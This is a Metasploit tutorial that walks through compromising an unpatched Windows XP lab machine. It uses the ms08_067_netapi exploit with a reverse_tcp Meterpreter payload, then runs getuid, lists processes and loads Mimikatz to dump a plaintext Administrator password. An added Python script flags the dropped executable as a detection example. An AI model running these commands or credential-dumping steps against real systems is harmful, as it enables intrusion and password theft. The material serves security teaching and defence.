Metasploit: Windows Session


Jarret W. Buse

If you have been reading the previous articles, you may be wondering how to access a system and gain control of it. In this article, I will cover the process of gaining access to a Windows system.

With so many Operating Systems (OS) on a network and on the Internet, there are a lot of possibilities to exploit a system. Unfortunately for the attacker, as exploits are discovered, patches and updates are released to close these security holes.

In this example, I am using a Windows XP system with only Service Pack 2 on it. I could also use Service Pack 3 with no additional patches and it would work as easily.

To find recent exploits, go to and search for the current month and year. For example, at the time of this writing I could type in “August 2015” (without the quotes) and perform the search for the newest exploits.

Before starting, realize that we are going to “exploit” a system. An exploit makes use of a security issue to breach the system and gain access to it. Once access is gained, there are numerous things which can be done to the system. What you can do on the system will depend on the OS.

The exploit we will use is the “ms08_067_netapi” module. It takes advantage of a parsing flaw in Windows XP: the fault is in the NetAPI32.dll file when File and Printer Sharing is in use. To check whether File and Printer Sharing is enabled, look for a Windows XP system with port 445 open. Once you find such a system, you can run the module against it.

So, open the Metasploit Framework (MSF) and at the “msf >” prompt type “use exploit/windows/smb/ms08_067_netapi”. The prompt should change to “msf exploit(ms08_067_netapi) >”, which verifies that the module was loaded. The module connects from your Local Host (LHOST) to the Remote Host (RHOST) on Remote Port (RPORT) 445. Once the module is loaded, type “set payload windows/meterpreter/reverse_tcp”.

Now that the modules are loaded, they need to be configured. Type “show options” to see which items must be filled in for everything to work. The items you need to fill in are:

  • RHOST - IP Address of the target system
  • LHOST - IP Address of your local system with Metasploit

You may have noticed that a PAYLOAD was also loaded. The PAYLOAD setting selects the Meterpreter payload, which is delivered by DLL injection into the memory of the remote system. Once this is done, the LHOST has full access to the Remote Host for as long as the RHOST is not shut down or locked up.

On my network, the RHOST is at and the LHOST is running Metasploit.

If the session was opened, the prompt should be “meterpreter >”. A message will also show “Meterpreter session 1 opened”, which means a session has been opened. Once the session is opened, there is much you can do with a Windows system.

One of the first things to do is find your privileges on the Windows system. Use the command “getuid” from your Metasploit system. By running this command, the result is “Server username: NT AUTHORITY\SYSTEM” showing that I have full administrative rights.

To see everything running on the RHOST, I can type “ps” in the Meterpreter session to get a full listing of the remote system's processes. My output is:

Process list

PID   Name              Arch  Session  User                          Path
---   ----              ----  -------  ----                          ----
0     [System Process]
4     System            x86   0        NT AUTHORITY\SYSTEM
224   aPNdqTCcx.exe     x86   0        NT AUTHORITY\SYSTEM           C:\WINDOWS\TEMP\aPNdqTCcx.exe
236   cmd.exe           x86   0        UFO-90CF3D06518\Jarret Buse   C:\WINDOWS\system32\cmd.exe
308   explorer.exe      x86   0        UFO-90CF3D06518\Jarret Buse   C:\WINDOWS\Explorer.EXE
396   smss.exe          x86   0        NT AUTHORITY\SYSTEM           \SystemRoot\System32\smss.exe
616   csrss.exe         x86   0        NT AUTHORITY\SYSTEM           \??\C:\WINDOWS\system32\csrss.exe
640   winlogon.exe      x86   0        NT AUTHORITY\SYSTEM           \??\C:\WINDOWS\system32\winlogon.exe
692   services.exe      x86   0        NT AUTHORITY\SYSTEM           C:\WINDOWS\system32\services.exe
704   lsass.exe         x86   0        NT AUTHORITY\SYSTEM           C:\WINDOWS\system32\lsass.exe
860   VBoxService.exe   x86   0        NT AUTHORITY\SYSTEM           C:\WINDOWS\system32\VBoxService.exe
904   svchost.exe       x86   0        NT AUTHORITY\SYSTEM           C:\WINDOWS\system32\svchost.exe
980   svchost.exe       x86   0        NT AUTHORITY\NETWORK SERVICE  C:\WINDOWS\system32\svchost.exe
1100  svchost.exe       x86   0        NT AUTHORITY\SYSTEM           C:\WINDOWS\System32\svchost.exe
1156  VBoxTray.exe      x86   0        UFO-90CF3D06518\Jarret Buse   C:\WINDOWS\system32\VBoxTray.exe
1188  svchost.exe       x86   0        NT AUTHORITY\NETWORK SERVICE  C:\WINDOWS\system32\svchost.exe
1240  alg.exe           x86   0        NT AUTHORITY\LOCAL SERVICE    C:\WINDOWS\System32\alg.exe
1288  svchost.exe       x86   0        NT AUTHORITY\LOCAL SERVICE    C:\WINDOWS\system32\svchost.exe
1432  spoolsv.exe       x86   0        NT AUTHORITY\SYSTEM           C:\WINDOWS\system32\spoolsv.exe
1688  wscntfy.exe       x86   0        UFO-90CF3D06518\Jarret Buse   C:\WINDOWS\system32\wscntfy.exe
1976  wuauclt.exe       x86   0        UFO-90CF3D06518\Jarret Buse   C:\WINDOWS\system32\wuauclt.exe

To see which process my Meterpreter payload is attached to, I can type the command “getpid”. The result is “Current pid: 1100”, showing that I am attached to “svchost.exe”.
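The same listing is what a defender has to work from: the payload itself is hidden inside a legitimate svchost.exe, so what stands out is a randomly named executable running as SYSTEM out of C:\WINDOWS\TEMP. The following Python script is an added example, not code from the original article; it parses a Meterpreter-style “ps” listing and flags such entries. The listing it contains is a constructed, trimmed copy of the one above, and the two detection rules are illustrative heuristics, not a complete baseline.

```python
import re

# Constructed sample: a trimmed copy of the Meterpreter "ps" listing above.
# Columns are separated by two or more spaces; the Path column may be absent.
SAMPLE_PS = r"""
PID   Name             Arch  Session  User                          Path
---   ----             ----  -------  ----                          ----
4     System           x86   0        NT AUTHORITY\SYSTEM
224   aPNdqTCcx.exe    x86   0        NT AUTHORITY\SYSTEM           C:\WINDOWS\TEMP\aPNdqTCcx.exe
236   cmd.exe          x86   0        UFO-90CF3D06518\Jarret Buse   C:\WINDOWS\system32\cmd.exe
640   winlogon.exe     x86   0        NT AUTHORITY\SYSTEM           \??\C:\WINDOWS\system32\winlogon.exe
1100  svchost.exe      x86   0        NT AUTHORITY\SYSTEM           C:\WINDOWS\System32\svchost.exe
"""

# One data row: pid, name, arch, session, user (may contain single spaces),
# then an optional path separated from the user by two or more spaces.
ROW = re.compile(r"^(\d+)\s+(\S+)\s+(x86|x64)\s+(\d+)\s+(.+?)(?:\s{2,}(\S.*))?\s*$")

# Directory fragments a SYSTEM-context process should not be launched from.
TEMP_DIRS = ("\\temp\\", "\\tmp\\")


def parse_ps(text):
    """Turn the listing into a list of dicts; header and separator lines are skipped."""
    rows = []
    for line in text.splitlines():
        m = ROW.match(line)
        if m:
            pid, name, arch, session, user, path = m.groups()
            rows.append({"pid": int(pid), "name": name, "arch": arch,
                         "session": int(session), "user": user, "path": path or ""})
    return rows


def suspicious(rows):
    """Return (pid, name, reason) for every row that trips a detection rule."""
    hits = []
    for r in rows:
        path = r["path"].lower()
        if any(d in path for d in TEMP_DIRS):
            hits.append((r["pid"], r["name"], "executable running from a temp directory"))
        elif r["user"].startswith("NT AUTHORITY\\") and path and "\\windows\\" not in path:
            hits.append((r["pid"], r["name"], "SYSTEM-context process outside the Windows directory"))
    return hits


if __name__ == "__main__":
    for pid, name, reason in suspicious(parse_ps(SAMPLE_PS)):
        print(f"pid {pid} {name}: {reason}")
```

Feed it the output of a live process listing (for example from a host inventory tool) and the TEMP-directory rule alone already separates the dropped executable from the expected XP system processes.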

What if you wanted to find the user's password? It is possible to pull the password from Random Access Memory (RAM) as plain text. To do this, you need to load a Meterpreter module called Mimikatz. To load the module, type “load mimikatz”. At the prompt, type “kerberos” to see the results. If I do this on my session, I get the following:

kerberos credentials

AuthID    Package    Domain           User              Password
------    -------    ------           ----              --------
0;999     NTLM       MSHOME           UFO-90CF3D06518$
0;188183  NTLM       UFO-90CF3D06518  Jarret Buse
0;997     Negotiate  NT AUTHORITY     LOCAL SERVICE
0;29129   NTLM
0;596715  NTLM       UFO-90CF3D06518  Administrator     HRHaggard

You can see from the results that the Administrator had logged in, so the password is still in memory. The password is “HRHaggard” (an excellent author).

From this example, you can see there are many possibilities for exploiting a Windows system. Try it out and see what you can accomplish by using Metasploit.

Keep in mind, this is not meant to teach malicious methods. The article is to show people how simple it is to gain access to an outdated system. It is meant to teach administrators to keep a system's software up-to-date. On the other hand, realize that exploits may be available for newer software which has not been patched yet. Security is an issue everywhere.

Also keep in mind that you do not need an outdated system or software with a security issue. In the next article, I will cover accessing a Linux system without using an OS or software security hole.
